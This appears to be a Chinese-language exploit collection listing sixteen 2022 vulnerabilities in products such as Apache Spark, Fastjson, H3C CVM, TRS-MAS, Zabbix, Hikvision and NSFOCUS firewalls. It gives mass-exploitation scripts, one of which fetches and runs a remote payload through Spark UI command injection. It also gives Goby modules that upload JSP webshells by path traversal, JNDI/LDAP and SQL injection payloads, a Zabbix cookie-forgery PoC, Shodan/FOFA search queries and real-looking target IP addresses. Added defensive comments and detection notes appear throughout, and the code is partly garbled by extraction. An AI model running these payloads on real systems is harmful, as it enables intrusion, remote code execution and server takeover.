1、Apache Spark UI 命令注入漏洞 [CVE-2022-33891]
Shodan 搜索:http.favicon.hash:856048515
import requests, ConfigParser, csv, requests, urllib3, time
import pandas as pd
# Configuration for the Spark UI PoC: a fixed User-Agent string and the
# host/payload names read from POC.conf.
# NOTE(review): this listing is Python 2 (`print` statements, `ConfigParser`,
# `readfp`) and its indentation was lost in extraction; it does not run as shown.
ua = 'https://github.com/west-wind/cve-2022-33891'
# `ua` is sent as the User-Agent header by CVE_2022_33891(); a fixed string
# like this is a cheap signature for WAF/IDS rules.
config = ConfigParser.ConfigParser()
# POC.conf is opened without a `with` block and the handle is never closed.
config.readfp(open(r'POC.conf'))
yourHost = config.get('PAYLOAD', 'yourHostHere')
yourPayload = config.get('PAYLOAD', 'yourPayloadHere')
# usage(): prints the authorisation warning and the expected input layout
# (a `targets` column in allTargets.csv; host and payload names in POC.conf),
# then sleeps 5 seconds. Takes no arguments and returns None.
# NOTE(review): the leading `n` in several strings looks like a stripped `\n`
# escape, another sign the listing is not verbatim.
def usage():
print "nWARNING: This script is inteded to be used for vulnerability testing purposes only. Ensure you're authorised to run your payload on the target prior to using this script!"
print "nExit now, if you are not authorised."
print "nThis POC expects to receive all targets in a CSV file --> allTargets.csv with one column titled --> targets, ex., http://12.23.45.67:9099 or http://spark.domain.com"
print "The / will be added by the script."
print "nEnter the payload to be executed on the target in the POC.conf file. "
print "Your host in --> yourHostHere 'http://my_domain_here.com'"
print "Your payload in --> yourPayloadHere 'payload.sh'nnn"
time.sleep(5)
# CVE_2022_33891(target): sends a single GET to `<target>/?doAs=...` whose
# value is a backtick-wrapped shell command assembled from the module-level
# yourHost/yourPayload, with `ua` as User-Agent and TLS verification disabled,
# then prints the URL, status code and response body. Returns None; any
# exception is caught and printed.
# Defensive notes:
#  - The injection sits in the Spark UI's `doAs` impersonation parameter and
#    is only reachable when `spark.acls.enable` is on. Keep ACLs off unless
#    needed, keep the UI off untrusted networks, and move to a Spark release
#    that fixes CVE-2022-33891.
#  - Detection: a `doAs=` query value containing backticks or `wget`/`chmod`/
#    `bash`, or the fixed User-Agent above, is high-signal in UI access logs.
#  - If building `url` raises (e.g. a non-string target), the handler's own
#    reference to `url` is an unbound-name error.
def CVE_2022_33891(target):
global yourPayload, yourHost, ua
try:
url = target + '/?doAs=`wget ' + yourHost + '/' + yourPayload + ' && chmod 755 ' + yourPayload + ' | bash`'
header = {'User-Agent': ua}
response = requests.get(url, headers=header, verify=False)
print "n[+] URL: ",url,"n[+] HTTP Status: ",response.status_code,"n[+] HTTP Text: ",response.text
except Exception as pocEx:
print "n[!] Exception occured: ",pocEx, url
# Entry point: show the usage banner, then read allTargets.csv and call
# CVE_2022_33891() once per value in its `targets` column. Any exception
# (missing file, missing column, ...) is caught and printed, not raised.
# No validation or de-duplication of the target values happens before use.
usage()
try:
df = pd.read_csv('allTargets.csv')
column1 = df.targets
for target in column1:
CVE_2022_33891(target)
except Exception as mainEx:
print "nException occured in main: ",mainEx
2、Fastjson代码执行漏洞(CVE-2022-25845)
Fastjson <= 1.2.80
{
"@type": "java.lang.Exception",
"@type": "com.github.isafeblue.fastjson.SimpleException",
"domain": "calc"
}
3、H3C CVM 前台任意文件上传漏洞
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)
// init registers the H3C CVM arbitrary-file-upload check with ExpManager.
// expJson holds the exploit metadata; its ScanSteps/ExploitSteps are
// placeholder `/test.php` probes and are not what the Go callbacks below run.
// NOTE(review): backslash escapes inside string literals (e.g. `\"`) appear
// to have been stripped when this page was extracted, so the listing does
// not compile verbatim.
// Defensive notes:
//  - The upload goes to `/cas/fileUpload/upload` with a `token` parameter
//    carrying `../` traversal into the webapp tree plus a `Content-range`
//    header; a `token` value containing `..` or ending in `.jsp` is a direct
//    detection signature for this abuse.
//  - Verification fetches `/cas/js/lib/buttons/<random>.jsp`; new .jsp files
//    appearing in that directory on a CVM host indicate compromise.
//  - expJson's Recommendation states no vendor patch was available at
//    disclosure (2022-05-25): restrict network access to the CVM management
//    interface and watch the vendor page linked there for updates.
func init() {
expJson := `{
"Name": "H3C CVM Arbitrary File Upload Vulnerability",
"Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Product": "H3C-CVM",
"Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
"DisclosureDate": "2022-05-25",
"Author": "[email protected]",
"FofaQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
"GobyQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
"Level": "3",
"Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "fileName",
"type": "input",
"value": "evil",
"show": ""
},
{
"name": "fileContent",
"type": "input",
"value": "<%out.println("123");%>",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Arbitrary File Creation"
],
"VulType": [
"Arbitrary File Creation"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "8.0",
"Translation": {
"CN": {
"Name": "H3C CVM 前台任意文件上传漏洞",
"Product": "H3C-CVM",
"Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
"Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;"><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM</span><span style="color: rgb(22, 28, 37); font-size: 16px;"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
"VulType": [
"⽂件上传"
],
"Tags": [
"⽂件上传"
]
},
"EN": {
"Name": "H3C CVM Arbitrary File Upload Vulnerability",
"Product": "H3C-CVM",
"Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"VulType": [
"Arbitrary File Creation"
],
"Tags": [
"Arbitrary File Creation"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
// exploitUploadFile2398429842 POSTs fileContent to the upload endpoint with
// TLS verification and redirects disabled; it reports true only on HTTP 200
// with `"success":true` in the body. Network errors yield false silently.
exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
// upload the file
requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Header.Store("Content-range", "bytes 0-10/20")
requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
requestConfig.Data = fileContent
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ""success\":true") {
return true
}
}
return false
}
// checkUploadFile12312313810923 GETs "/" + fileName and reports true when the
// response is HTTP 200 and its body contains fileContent.
checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
}
return false
}
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
// Scan callback: uploads a JSP with a random name that echoes a random
// marker, then confirms the marker is served back from the upload path.
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
rand := goutils.RandomHexString(6)
rand2 := goutils.RandomHexString(6)
if exploitUploadFile2398429842(rand2, "<%out.print(""+rand+"");%>", u) {
return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
}
return false
},
// Exploit callback: uploads the user-supplied fileName/fileContent from
// ss.Params and, on success, reports the resulting path in Output.
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
fileContent := ss.Params["fileContent"].(string)
fileName := ss.Params["fileName"].(string)
if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {
expResult.Success = true
expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"
}
return expResult
},
))
}
// http://183.63.173.141:8080/
// https://60.190.202.42:8443/
// http://61.53.232.5:28080/
4、H3C企业路由器(ER、ERG2、GR系列)任意用户登录/命令执行
/userLogin.asp/actionpolicy_status/
5、Roxy-WI 未经身份验证的远程代码执行
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: https://192.168.56.114
Dnt: 1
Referer: https://192.168.56.114/app/login.py
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45
6、TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
// init registers the TRS-MAS testCommandExecutor.jsp check. Both callbacks
// passed to NewExploit are nil, so Goby drives detection and exploitation
// purely from expJson: a GET to /mas/sysinfo/testCommandExecutor.jsp matched
// on HTTP 200 and the page's title string, with the exploit step passing the
// `cmdLine` parameter straight through in the query string.
// Defensive notes:
//  - Per expJson's Recommendation the affected versions are no longer
//    updated; block /sysinfo/testCommandExecutor.jsp at a WAF or reverse
//    proxy and remove the diagnostic page from production deployments.
//  - Detection: any request to that path is high-signal, and one carrying a
//    `cmdLine` query parameter is a clear exploitation attempt.
func init() {
expJson := `{
"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
"Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"Product": "TRS-MAS",
"Homepage": "http://www.trs.com.cn/",
"DisclosureDate": "2022-04-28",
"Author": "liubye",
"FofaQuery": "header="X-Mas-Server" || banner="X-Mas-Server"",
"GobyQuery": "header="X-Mas-Server" || banner="X-Mas-Server"",
"Level": "3",
"Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>",
"References": [
"https://cn-sec.com/archives/966820.html"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmdLine",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mas/sysinfo/testCommandExecutor.jsp",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "测试命令行进程执行",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "测试命令行进程执行",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Command Execution"
],
"VulType": [
"Command Execution"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.7",
"Translation": {
"CN": {
"Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行",
"Product": "拓尔思-MAS",
"Description": "<p><span style="color: rgb(45, 46, 47); font-size: medium;">TRS MAS是基于移动互联网时代音视频的使用特点,</span><span style="color: rgb(45, 46, 47); font-size: medium;">北京拓尔思信息技术股份有限公司</span><span style="color: rgb(45, 46, 47); font-size: medium;">推出的一套通用型媒资管理系统,同一个音视频资源能面向不同的终端平台提供使用,有效节省成本,简化操作。</span></p><p><span style="color: rgb(45, 46, 47); font-size: medium;">TRS MAS </span><span style="color: rgb(45, 46, 47); font-size: medium;">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>",
"Recommendation": "<p><span style="color: rgb(0, 0, 0); font-size: 18px;">目前受漏洞影响的版本官方已停止更新,建议使用防御设备进行防护,禁止对 <span style="color: rgb(0, 0, 0); font-size: 18px;">/sysinfo/testCommandExecutor.jsp 路径的访问。</span></span><br></p>",
"Impact": "<p><span style="font-size: medium; color: rgb(45, 46, 47);">TRS MAS </span><span style="font-size: medium; color: rgb(45, 46, 47);">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
"Product": "TRS-MAS",
"Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>",
"Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"VulType": [
"Command Execution"
],
"Tags": [
"Command Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
// No custom scan/exploit callbacks: the JSON steps above are the whole check.
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
7、TRS-WAS远程命令执行
/mas/sysinfo/testCommandExecutor.jsp
8、WebLogic 反序列化远程命令执行路径探测
/_async/AsyncResponseService
9、Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)
import re
from collections import OrderedDict
from pocsuite3.lib.utils import random_str
from pocsuite3.api
import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option
import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD
import base64
import json
from urllib.parse import unquote,quote
# Silence urllib3 warnings; the PoC below sends requests with verify=False.
requests.packages.urllib3.disable_warnings()
# DemoPOC: pocsuite3 check for the Zabbix SAML SSO login bypass
# (CVE-2022-23131).
# _verify flow: GET self.url to obtain a zbx_session cookie, URL-decode,
# base64-decode and JSON-parse it, re-encode it with a `saml_data` block
# naming the Admin user while keeping the original `sessionid` and `sign`,
# then GET /index_sso.php with that cookie and look for admin-page strings.
# Defensive notes:
#  - The code keeps `sign` unchanged while altering `saml_data`, which
#    implies the signature does not cover that field -- confirm against the
#    advisory. Per desc the bypass needs SAML SSO enabled (non-default);
#    upgrade to a Zabbix release that fixes CVE-2022-23131, and disabling
#    SAML SSO until then should remove the exposure.
#  - Detection: a request to /index_sso.php whose zbx_session cookie decodes
#    to JSON containing `saml_data`, from a client that never completed the
#    SAML assertion exchange with the IdP.
# Code notes (left as-is):
#  - `if 'User settings' and 'Zabbix SIA' in res.text` only tests the second
#    string; the first literal is always truthy.
#  - `_attack` calls `_verify()` unqualified, which raises NameError.
#  - The bare `except:` around the first GET also swallows KeyboardInterrupt.
#  - createDate (2021-8-20) precedes vulDate (2022-2-25) and vulType is
#    COMMAND_EXECUTION for what desc describes as an auth bypass: template
#    metadata that was not updated.
# NOTE(review): the class body's indentation was lost in extraction.
class DemoPOC(POCBase):
vulID = '0' # ssvid ID; use 0 when the PoC is submitted together with the vulnerability
version = '1' # defaults to 1
author = 'Infiltrator' # PoC author
vulDate = '2022-2-25' # vulnerability disclosure date (today's date if unknown)
createDate = '2021-8-20' # date the PoC was written
updateDate = '2021-9-12' # PoC update date; defaults to the creation date
references = [''] # vulnerability source links; leave empty for 0day
name = 'Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)' # PoC name
appPowerLink = '' # vendor homepage
appName = '-' # affected application name
appVersion = '-' # affected versions
vulType = VUL_TYPE.COMMAND_EXECUTION # vulnerability type; see the vulnerability type reference table
category = POC_CATEGORY.EXPLOITS.WEBAPP
samples = [] # test samples: sites on which the PoC was verified
install_requires = [] # third-party module dependencies; avoid them where possible, otherwise fill in per the "PoC third-party dependency notes"
desc = '''
在启用 SAML SSO 身份验证(非默认)的情况下,未经身份验证的攻击者可以通过修改Cookie数据,绕过身份认证获得对 Zabbix 前端的管理员访问权限。
''' # brief vulnerability description
pocDesc = '''
poc的用法描述
''' # PoC usage description
# _options: no extra options; returns an empty OrderedDict.
def _options(self):
opt = OrderedDict() # value = self.get_option('key')
return opt
# _verify: returns an Output marked success (with the forged cookie) or fail.
def _verify(self):
output = Output(self)
# verification code
s=requests.Session()
try:
html=s.get(self.url,verify=False)
except:
output.fail('Could not get Cookie!')
return output
try:
set_cookie=base64.b64decode(unquote(html.cookies['zbx_session'])).decode('utf8')
except KeyError:
output.fail('Could not find zbx_session in Cookies')
return output
set_cookie=json.loads(set_cookie)
new_cookie=base64.b64encode(json.dumps({"saml_data":{"username_attribute":"Admin"},'sessionid':set_cookie['sessionid'],'sign':set_cookie['sign']}).encode('utf8')).decode('utf8')
head={'Cookie':'zbx_session='+new_cookie}
res=s.get(self.url+'/index_sso.php',headers=head,verify=False)
if 'User settings' and 'Zabbix SIA' in res.text:
result={}
result["Cookie"]='zbx_session='+new_cookie
output.success(result)
return output
# _attack: intended to delegate to _verify; see the code note above.
def _attack(self):
_verify()
# Register the DemoPOC class with pocsuite3
register_poc(DemoPOC)
10、帆软报表反序列化
webroot/decision/remote/design/channel
11、泛微OA-0day管理员任意登录
URL
/mobile/plugin/VerifyQuickLogin.jsp
Payload
identifier=1&language=1&ipaddress=
12、海康威视综合运营管理平台RCE漏洞
URL
/bic/ssoService/v1/applyCT
Payload
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
13、用友GRP-U8财务管理软件任意文件上传
/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=
14、用友时空KSOA软件前台文件上传漏洞
/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
15、红帆医疗云OA医用版前台SQL注入漏洞
/api/switch-value/list?sorts=%5B%7B%22Field%22:%22convert(int,stuff((select%20quotename(name)%20from%20sys.databases%20for%20xml%20path(%27%27),1,0,%27%27))%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c5c89905a7)
16、绿盟下一代防火墙 resourse.php 任意文件上传漏洞
package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"net/url"
"strings"
"time"
)
// init registers the NSFOCUS NGFW resourse.php upload check. expJson's
// ScanSteps/ExploitSteps are `/test.php` placeholders; the real logic is in
// the two callbacks below, which talk to port 8081 (upload API) and port 4433
// (web mail UI) on the target's IP rather than to the scanned URL.
// NOTE(review): `rn` inside the multipart bodies is a stripped `\r\n` and
// other backslash escapes are missing too; the listing is not verbatim.
// Defensive notes:
//  - Mitigation, from expJson's Recommendation: block access to port 8081
//    and apply the vendor update from the linked site.
//  - Detection: multipart POSTs to /api/v1/device/bugsInfo, in particular
//    with a part filename beginning `sess_` (a PHP session file) or ending
//    `.php`; a PHPSESSID_NF cookie equal to the fixed value used below; and
//    POSTs to /mail/include/header_main.php carrying a `1=` form field.
//  - The hard-coded multipart boundaries and session id make this PoC
//    itself easy to fingerprint in traffic captures.
func init() {
expJson := `{
"Name": "nsfocus resourse.php arbitrary file upload vulnerability",
"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"Product": "nsfocus",
"Homepage": "https://www.nsfocus.com.cn/",
"DisclosureDate": "2022-07-18",
"Author": "LittleBlack",
"FofaQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
"GobyQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
"Level": "3",
"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "system('id');",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"VulType": [
"Code Execution"
],
"Tags": [
"Code Execution"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.5",
"Translation": {
"CN": {
"Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
"Product": "绿盟下一代防火墙",
"Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
"Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
"Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
"VulType": [
"代码执⾏"
],
"Tags": [
"代码执⾏"
]
},
"EN": {
"Name": "nsfocus resourse.php 任意文件上传漏洞",
"Product": "nsfocus",
"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"VulType": [
"Code Execution"
],
"Tags": [
"Code Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
// Scan callback: two multipart uploads to port 8081 (a session file, then a
// PHP file) separated by a 5 s sleep, followed by a POST to port 4433 with
// the fixed PHPSESSID_NF cookie; true only if the md5 marker appears in
// the final response. Every request runs with TLS verification off.
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
uri1 := "/api/v1/device/bugsInfo"
cfg1 := httpclient.NewPostRequestConfig(uri1)
cfg1.VerifyTls = false
cfg1.FollowRedirect = false
cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
